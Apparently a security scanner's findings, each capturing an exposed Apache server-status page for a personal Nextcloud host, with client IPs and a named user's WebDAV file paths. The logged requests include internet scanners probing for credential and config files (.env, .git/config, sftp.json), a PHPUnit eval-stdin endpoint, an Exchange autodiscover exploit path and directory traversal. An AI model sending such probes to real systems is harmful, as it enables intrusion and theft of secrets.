0.75182217922290.00.038.64 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-4414391610/4/606_ 0.9815610781010230.00.0214.06 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-4414391610/1/608_ 0.551510886090.00.0012.40 198.20.87.98http/1.1localhost:80GET /favicon.ico HTTP/1.1 1-4414391610/5/579_ 1.0097208923120.00.0217.28 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-4414391610/3/561_ 0.9421361000530.00.023.62 161.35.27.144h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-4414391610/4/556_ 0.99127195839790.00.046.68 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-4414391610/2/580_ 0.89122173875010.00.014.78 89.95.112.211http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-4414391610/3/545_ 0.712211950800.00.035.07 161.35.27.144http/1.1 1-4414391610/3/610_ 0.802183996710.00.0314.90 161.35.27.144h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-4414391610/4/572_ 0.92321561002330.00.0511.01 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-4414391610/4/611_ 1.01371781047280.00.046.93 89.95.112.211http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Be
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c480510ae0aa2
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Saturday, 23-Dec-2023 21:48:26 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 32 Parent Server MPM Generation: 31 Server uptime: 29 days 14 hours 48 minutes 46 seconds Server load: 0.02 0.01 0.00 Total accesses: 54320 - Total Traffic: 633.7 MB - Total Duration: 10434441 CPU Usage: u90.21 s173.41 cu412.14 cs124.82 - .0313% CPU load .0212 requests/sec - 259 B/second - 11.9 kB/request - 192.092 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01384669no0yes025000 21384670no0yes124000 Sum200 149000 _________________________.........................______________ __W________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3113846690/4/929_ 0.600961663830.00.028.46 139.144.150.45http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-3113846690/2/852_ 0.532378631610610.00.027.33 128.199.62.55http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 0-3113846690/1/886_ 0.560541761330.00.025.72 139.144.150.45h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-3113846690/5/887_ 0.630721801550.00.035.66 139.144.150.45http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 0-3113846690/0/922_ 0.0002051840980.00.006.35 54.36.115.221http/1.1 0-3113846690/3/890_ 0.630681657330.00.0323.44 139.144.150.45http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 0-3113846690/1/906_ 0.35950701634310.00.005.56 128.199.62.55h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-3113846690/2/901_ 0.4602751703060.00.0215.13 198.235.24.71http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-3113846690/3/868_ 0.5423781331683280.00.036.92 128.199.62.55http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-3113846690/2/909_ 0.60237801771350.00.006.27 134.209.216.36http/1.1localhost:80\x16\x03\x01 0-3113846690/2/887_ 0.2695081131685950.00.0212.41 198.235.24.71http/1.1 0-3113846690/3/892_ 0.560601724680.00.0510.72 139.144.150.45h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-3113846690/1/918_ 0.1623782141920730.00.028.58 185.100.87.136http/1.1 0-3113846690/2/904_ 0.31001929120.00.005.80 139.144.150.45http/1.1 0-3113846690/3/918_ 0.592378791926460.00.035.65 134.209.216.36http/1.1localhost:80\x16\x03\x01 0-3113846690/1/942_ 0.4002631847280.00.0219.68 104.243.37.151http/1.1ravignon.mycloud.paris:443GET /assets/js/v2/exchange.min.js HTTP/1.1 0-3113846690/3/845_ 0.36536811703830.00.015.48 128.199.62.55http/1.1 0-3113846690/2/906_ 0.35825621624730.00.005.55 128.199.62.55http/1.1 0-3113846690/2/862_ 0.57826001532670.00.0016.57 83.97.73.87http/1.1localhost:80GET /actuator/gateway/routes HTTP/1.1 0-3113846690/3/890_ 0.630651821400.00.0320.66 139.144.150.45http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-3113846690/4/880_ 0.36793231660440.00.0117.76 54.37.79.75http/1.1 0-3113846690/1/886_ 0.41001709190.00.006.13 139.144.150.45http/1.1 0-3113846690/1/882_ 0.570551724690.00.0215.38 128.199.62.55http/1.1ravignon.mycloud.paris:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-3113846690/2/911_ 0.58793211638550.00.006.52 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-3113846690/1/895_ 0.59536841726560.00.005.59 43.159.141.180http/1.1localhost:80GET / HTTP/1.1 1-29-0/0/549. 0.001648201903690.00.006.17 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 1-29-0/0/545. 0.0016482082996770.00.0014.01 54.36.115.221http/1.1 1-29-0/0/546. 0.00164820138910960.00.003.68 192.241.199.82http/1.1ravignon.mycloud.paris:443GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1 1-29-0/0/593. 0.0016482011018060.00.007.90 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 1-29-0/0/548. 0.0016482011058650.00.0023.20 198.235.24.186http/1.1localhost:80GET / HTTP/1.0 1-29-0/0/527. 0.001648201956290.00.003.51 106.75.126.54http/1.1 1-29-0/0/525. 0.00164820201970790.00.0010.66 54.36.115.221http/1.1 1-29-0/0/525. 0.001648202797190.00.003.38 118.194.250.113http/1.1ravignon.mycloud.paris:443GET /dist/core-files_fileinfo.js?v=ccbf35ac-1 HTTP/1.1 1-29-0/0/539. 0.001648201883960.00.007.01 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 1-29-0/0/518. 0.0016482085970000.00.008.99 106.75.126.54http/1.1 1-29-0/0/577. 0.001648200851770.00.009.90 83.97.73.87http/1.1localhost:80GET /actuator/gateway/routes HTTP/1.1 1-29-0/0/558. 0.001648200974620.00.005.00 79.188.41.85http/1.1 1-29-0/0/504. 0.00164820184848120.00.008.13 94.102.61.75http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-29-0/0/539. 0.0016482055855680.00.006.99 118.194.250.113http/1.1ravignon.mycloud.paris:443GET /axis2/axis2-admin/ HTTP/1.1 1-29-0/0/526. 0.001648200895990.00.007.15 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 1-29-0/0/562. 0.001648202968400.00.0013.70 60.188.57.0http/1.1localhost:80GET / HTTP/1.1 1-29-0/0/557. 0.001648208836050.00.0012.01 45.55.0.39http/1.1 1-29-0/0/523. 0.001648200880930.00.0014.06 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 1-29-0/0/513. 0.001648202946990.00.003.20 54.36.115.221http/1.1 1-29-0/0/508. 0.001648203804060.00.006.29 162.243.145.40h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-29-0/0/531. 0.001648203835170.00.004.34 83.97.73.87http/1.1localhost:80GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 1-29-0/0/494. 0.0016482088915340.00.004.70 198.235.24.163http/1.1 1-29-0/0/561. 0.0016482067955350.00.0014.53 118.194.250.113http/1.1ravignon.mycloud.paris:443GET /axis2-admin/ HTTP/1.1 1-29-0/0/523. 0.0016482078916060.00.007.69 198.199.115.10http/1.1 1-29-0/0/560. 0.00164820124997410.00.006.53 35.187.98.121http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 2-3113846700/4/227_ 1.403260434080.00.021.73 118.26.39.163http/1.1 2-3113846700/9/242_ 1.55061567080.00.104.27 139.144.150.45http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 2-3113846700/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c480509390fd0
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Monday, 11-Dec-2023 11:49:32 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 20 Parent Server MPM Generation: 19 Server uptime: 17 days 4 hours 49 minutes 52 seconds Server load: 0.28 0.09 0.03 Total accesses: 31528 - Total Traffic: 418.5 MB - Total Duration: 5840150 CPU Usage: u60.19 s101.36 cu230.79 cs71.17 - .0312% CPU load .0212 requests/sec - 295 B/second - 13.6 kB/request - 185.237 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01145669no0yes025000 31145670no0yes124000 Sum200 149000 _________________________....................................... ..........._________W_______________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1911456690/23/528_ 4.407693968470.00.204.60 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-1911456690/13/473_ 3.9913087853650.00.074.79 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-1911456690/17/486_ 4.30060991900.00.103.02 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-1911456690/22/500_ 4.213641030450.00.142.94 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-1911456690/21/521_ 4.413881038010.00.153.64 159.223.102.13http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-1911456690/13/493_ 4.274189866640.00.1020.73 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-1911456690/18/511_ 4.28382932650.00.123.08 159.223.102.13h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 0-1911456690/15/483_ 4.353278883740.00.0812.36 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-1911456690/19/487_ 4.37072895260.00.134.35 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-1911456690/15/518_ 4.2231311005480.00.103.82 159.223.102.13http/1.1 0-1911456690/17/501_ 4.291761022880.00.109.37 57.129.23.166http/1.1 0-1911456690/18/496_ 4.44195918140.00.106.93 159.223.102.13http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-1911456690/13/527_ 4.292661094550.00.113.25 159.223.102.13http/1.1 0-1911456690/16/512_ 4.441631089000.00.093.13 159.223.102.13http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 0-1911456690/16/508_ 4.15161985860.00.132.93 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-1911456690/19/534_ 4.3913511911009470.00.1514.24 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-1911456690/11/467_ 4.44163937460.00.093.26 159.223.102.13http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 0-1911456690/22/507_ 4.450164918070.00.163.02 159.223.102.13http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-1911456690/14/462_ 4.26130701859710.00.1113.15 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-1911456690/18/512_ 4.2671681111770.00.1415.24 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-1911456690/17/491_ 4.3016176972180.00.1213.33 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-1911456690/19/506_ 4.32711721011250.00.153.33 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-1911456690/17/487_ 4.414672966490.00.109.63 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-1911456690/16/518_ 4.414760909020.00.123.40 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-1911456690/14/500_ 4.2741661008260.00.093.29 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 1-18-0/0/280. 0.004256968426410.00.001.73 172.104.137.47http/1.1ravignon.mycloud.paris:443GET /admin.jsa HTTP/1.1 1-18-0/0/263. 0.004256957472350.00.0011.38 54.36.115.221http/1.1 1-18-0/0/286. 0.004256960478660.00.002.03 172.104.137.47http/1.1 1-18-0/0/285. 0.004256961470670.00.001.78 54.36.115.221http/1.1 1-18-0/0/287. 0.00425691591710.00.0021.22 198.12.229.99http/1.1localhost:80GET / HTTP/1.1 1-18-0/0/275. 0.0042569186492010.00.001.79 172.104.137.47http/1.1 1-18-0/0/267. 0.00425690472290.00.008.77 172.104.137.47http/1.1 1-18-0/0/268. 0.004256966400270.00.001.56 172.104.137.47http/1.1 1-18-0/0/274. 0.0042569162447120.00.005.13 185.233.19.155http/1.1 1-18-0/0/260. 0.00425690465640.00.006.40 172.104.137.47http/1.1localhost:80GET / HTTP/1.1 1-18-0/0/317. 0.004256954432350.00.005.00 198.12.229.99http/1.1 1-18-0/0/288. 0.004256993433340.00.001.96 172.104.137.47http/1.1 1-18-0/0/273. 0.00425692421040.00.003.55 172.104.137.47http/1.1 1-18-0/0/254. 0.0042569257370490.00.001.57 45.165.204.64http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-18-0/0/264. 0.00425690419100.00.005.15 172.104.137.47http/1.1 1-18-0/0/281. 0.004256954472780.00.008.89 172.104.137.47http/1.1ravignon.mycloud.paris:443GET /admin.cgi HTTP/1.1 1-18-0/0/291. 0.004256970400070.00.006.87 172.104.137.47http/1.1 1-18-0/0/258. 0.0042569236453150.00.0012.21 34.140.248.32http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-18-0/0/263. 0.00425691457130.00.001.56 185.233.19.155http/1.1localhost:80GET / HTTP/1.1 1-18-0/0/255. 0.00425690416010.00.004.47 172.104.137.47http/1.1 1-18-0/0/257. 0.00425691346020.00.001.51 101.91.148.219http/1.1localhost:80GET / HTTP/1.1 1-18-0/0/242. 0.00425690499250.00.002.47 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 1-18-0/0/296. 0.00425692496870.00.0012.94 121.185.223.240http/1.1localhost:80GET / HTTP/1.0 1-18-0/0/274. 0.00425691461300.00.006.14 121.185.223.240http/1.1 1-18-0/0/288. 0.00425691547320.00.004.66 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 2-18-0/0/197<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805d630a348
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-10-26T13:44:44 Current Time: Friday, 01-Dec-2023 00:07:14 UTC Restart Time: Friday, 24-Nov-2023 06:59:39 UTC Parent Server Config. Generation: 10 Parent Server MPM Generation: 9 Server uptime: 6 days 17 hours 7 minutes 34 seconds Server load: 0.00 0.01 0.00 Total accesses: 13205 - Total Traffic: 229.1 MB - Total Duration: 2547833 CPU Usage: u19.24 s37.67 cu99.74 cs31.02 - .0324% CPU load .0228 requests/sec - 414 B/second - 17.8 kB/request - 192.945 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 1956422no0yes025000 2956367no0yes124000 Sum200 149000 ........................._________________________W_____________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-8-0/0/215. 0.00750399010.00.001.29 18.116.202.194http/1.1ravignon.mycloud.paris:80GET /.well-known/acme-challenge/Aun9eIk-Xxexwr1H1pDsnKBFssvvyGK 0-8-0/0/202. 0.0075227414600.00.001.27 85.239.241.240http/1.1ravignon.mycloud.paris:443GET /cgi-bin/luci HTTP/1.1 0-8-0/0/210. 0.00750437290.00.001.19 34.220.70.10http/1.1ravignon.mycloud.paris:80GET /.well-known/acme-challenge/Aun9eIk-Xxexwr1H1pDsnKBFssvvyGK 0-8-0/0/199. 0.00750451680.00.001.26 66.133.109.36http/1.1ravignon.mycloud.paris:80GET /.well-known/acme-challenge/Aun9eIk-Xxexwr1H1pDsnKBFssvvyGK 0-8-0/0/227. 0.007564472910.00.001.51 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/Nouveau%20do 0-8-0/0/202. 0.007579369560.00.0018.92 107.170.252.41http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/225. 0.0075129426270.00.001.35 45.142.182.116http/1.1 0-8-0/0/191. 0.00751305210.00.001.07 31.7.58.42http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/220. 0.007584394370.00.002.17 54.36.115.221http/1.1 0-8-0/0/216. 0.0075197368940.00.001.47 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/Nouveau%20do 0-8-0/0/221. 0.007572407520.00.007.49 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-8-0/0/212. 0.0075119380280.00.001.25 185.117.37.101http/1.1ravignon.mycloud.paris:443MOVE /remote.php/dav/files/Beatrice%20Ravignon/Nouveau%20dossie 0-8-0/0/223. 0.0075268443720.00.001.37 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-8-0/0/220. 0.00750447360.00.001.20 45.95.147.236http/1.1localhost:80GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1 0-8-0/0/215. 0.007592409170.00.001.25 68.69.185.50http/1.1localhost:80GET ../../proc/ HTTP 0-8-0/0/227. 0.00750411370.00.005.65 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 0-8-0/0/215. 0.0075115435030.00.001.77 185.117.37.101http/1.1ravignon.mycloud.paris:443MOVE /remote.php/dav/files/Beatrice%20Ravignon/DOSSIERS%20BR/LE 0-8-0/0/211. 0.0075708398080.00.001.21 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/notifications/api/v2/notifications?format= 0-8-0/0/195. 0.00750352540.00.0011.37 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 0-8-0/0/207. 0.007570414500.00.009.88 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-8-0/0/205. 0.007588405800.00.002.00 54.36.115.221http/1.1 0-8-0/0/232. 0.007557442950.00.001.35 62.233.50.179http/1.1 0-8-0/0/191. 0.007562366050.00.007.69 161.35.236.158http/1.1 0-8-0/0/245. 0.007582421830.00.001.68 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-8-0/0/207. 0.007580364480.00.001.55 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 1-99564220/0/163_ 0.000279316330.00.001.12 64.227.36.147http/1.1 1-99564220/0/164_ 0.001324360550.00.0010.87 64.227.36.147http/1.1 1-99564220/1/184_ 0.0520370390.00.001.31 74.207.237.114http/1.1ravignon.mycloud.paris:80GET /login.action HTTP/1.1 1-99564220/1/172_ 0.0430314080.00.001.22 74.207.237.114http/1.1ravignon.mycloud.paris:80GET /debug/default/view?panel=config HTTP/1.1 1-99564220/0/184_ 0.0003446450.00.0020.68 74.207.237.46h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-99564220/1/173_ 0.0100363440.00.001.21 74.207.237.114http/1.1ravignon.mycloud.paris:80GET / HTTP/1.1 1-99564220/1/172_ 0.07072347060.00.005.38 74.207.237.46http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-99564220/2/175_ 0.08087279170.00.001.10 74.207.237.46http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-99564220/1/175_ 0.0200337450.00.004.66 74.207.237.114http/1.1ravignon.mycloud.paris:80GET /about HTTP/1.1 1-99564220/0/162_ 0.00090323110.00.006.01 74.207.237.46h2ravignon.mycloud.paris:443[0/0] Software caused connection abort 1-99564220/0/185_ 0.00392336940.00.001.21 185.117.37.101http/1.1ravignon.mycloud.paris:443GET /ocs/v2.php/apps/user_status/api/v1/user_status?format=json 1-99564220/1/178_ 0.0430330490.00.001.28 74.207.237.114http/1.1ravignon.mycloud.paris:80GET /v2/_catalog HTTP/1.1 1-99564220/0/173_ 0.003151323240.00.003.09 74.207.237.46http/1.1 1-99564220/0/153_ 0.003280267390.00.001.04 64.227.36.147http/1.1 1-99564220/1/168_ 0.0530319570.00.004.62 74.207.237.114http/1.1ravignon.mycloud.paris:80GET /server-status HTTP/1.1 1-99564220/0/177_ 0.002123339090.00.005.21 74.207.237.46http/1.1 1-99564220/1/176_ 0.0620272550.00.006.33 74.207.237.114http/1.1ravignon.mycloud.paris:80GET /.DS_Store HTTP/1.1 1-99564220/0/150_ 0.0024296720.00.008.68 74.207.237.46http/1.1 1-99564220/0/170_ 0.002109304800.00.001.16 80.66.88.204http/1.1localhost:80\x03 1-99564220/1/154_ 0.06286295340.00.011.03 74.207.237.46http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-99564220/1/154_ 0.0620251130.00.000.96 74.207.237.114http/1.1ravignon.mycloud.paris:80GET /.git/config HTTP/1.1 1-99564220/0/155_ 0.002194414130.00.001.99 167.94.138.127http/1.1 1-99564220/1/185_ 0.0610357830.00.0012.37 74.207.237.114http/1.1ravignon.mycloud.paris:80GET /s/2393e2937313e2039313e2930313/_/;/META-INF/maven/com.atla 1-99564220/1/175_ 0.0610345290.00.005.63 74.207.237.114http/1.1ravignon.mycloud.paris:80GET /config.json HTTP/1.1 1-99564220/1/182_ 0.07188419930.00.004.03 74.207.237.46http/1.1ravignon.mycloud.paris:443GET /debug/defa
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805417fec9a
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Thursday, 16-Nov-2023 23:15:42 UTC Restart Time: Friday, 06-Oct-2023 03:05:25 UTC Parent Server Config. Generation: 47 Parent Server MPM Generation: 46 Server uptime: 41 days 20 hours 10 minutes 16 seconds Server load: 0.04 0.03 0.00 Total accesses: 57094 - Total Traffic: 752.6 MB - Total Duration: 46198185 CPU Usage: u118.87 s224.42 cu417.38 cs116.16 - .0243% CPU load .0158 requests/sec - 218 B/second - 13.5 kB/request - 809.16 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 1680315no0yes124000 2680316no0yes025000 Sum200 149000 .........................__________W____________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-8-0/0/326. 0.0028485390589730.00.002.19 120.198.36.66http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/326. 0.0028485390543720.00.002.28 27.195.120.92http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/336. 0.0028485390545190.00.002.42 69.164.213.115http/1.1 0-8-0/0/318. 0.0028485392564660.00.002.68 94.102.61.75http/1.1ravignon.mycloud.paris:443GET /core/img/favicon-touch.png HTTP/1.1 0-8-0/0/310. 0.0028485390488710.00.002.01 164.52.0.93http/1.1 0-8-0/0/317. 0.0028485392513160.00.003.47 107.6.112.252http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/358. 0.0028485390606820.00.002.32 107.6.112.252http/1.1localhost:80GET /favicon.ico HTTP/1.1 0-8-0/0/332. 0.0028485390573270.00.004.14 35.203.211.6http/1.1 0-8-0/0/327. 0.002848539210589440.00.002.36 162.55.103.197http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 0-8-0/0/343. 0.0028485391626100.00.004.02 95.214.55.115http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/297. 0.0028485390549710.00.002.35 35.203.211.6http/1.1 0-8-0/0/315. 0.002848539139532070.00.0011.75 112.26.65.151http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/326. 0.0028485390555260.00.006.49 18.184.165.11http/1.1 0-8-0/0/332. 0.0028485390496420.00.002.08 35.203.211.6http/1.1 0-8-0/0/337. 0.00284853991555810.00.003.54 109.237.97.180http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-8-0/0/328. 0.0028485390602940.00.001.97 199.230.124.3http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/334. 0.0028485390517220.00.003.74 35.203.211.6http/1.1 0-8-0/0/321. 0.0028485393458780.00.004.09 185.36.81.33http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/319. 0.0028485391558050.00.002.20 173.214.166.170http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/330. 0.0028485390578770.00.002.16 44.197.188.109http/1.1 0-8-0/0/329. 0.0028485390582210.00.002.93 89.248.165.51http/1.1 0-8-0/0/348. 0.0028485392678910.00.002.44 101.74.200.170http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/339. 0.0028485391634660.00.0010.38 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-8-0/0/332. 0.0028485390627220.00.002.22 107.6.112.252http/1.1 0-8-0/0/310. 0.0028485390572310.00.001.83 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 1-466803150/34/1195_ 7.590742193370.00.1711.35 164.92.84.255http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-466803150/34/1122_ 7.23002060310.00.207.46 8.222.253.90h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-466803150/37/1133_ 7.4612482074940.00.298.61 94.102.61.75http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-466803150/41/1164_ 7.4801092267910.00.2612.72 104.234.204.32http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 1-466803150/35/1110_ 7.24601829130.00.1914.62 91.209.70.180http/1.1 1-466803150/36/1203_ 7.4042232270130.00.2114.25 164.92.84.255http/1.1 1-466803150/28/1116_ 7.24501955730.00.177.96 164.92.84.255h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-466803150/39/1164_ 7.4041072132180.00.229.63 164.92.84.255h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-466803150/31/1145_ 7.38521960260.00.1919.22 71.6.134.235http/1.1localhost:80GET / HTTP/1.1 1-466803150/34/1122_ 7.24301832140.00.1917.93 164.92.84.255h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-466803151/37/1158W 7.50002241930.00.2120.87 164.92.84.255http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-466803150/28/1126_ 7.3801432122570.00.1813.96 8.222.253.90h2ravignon.mycloud.paris:443idle, streams: 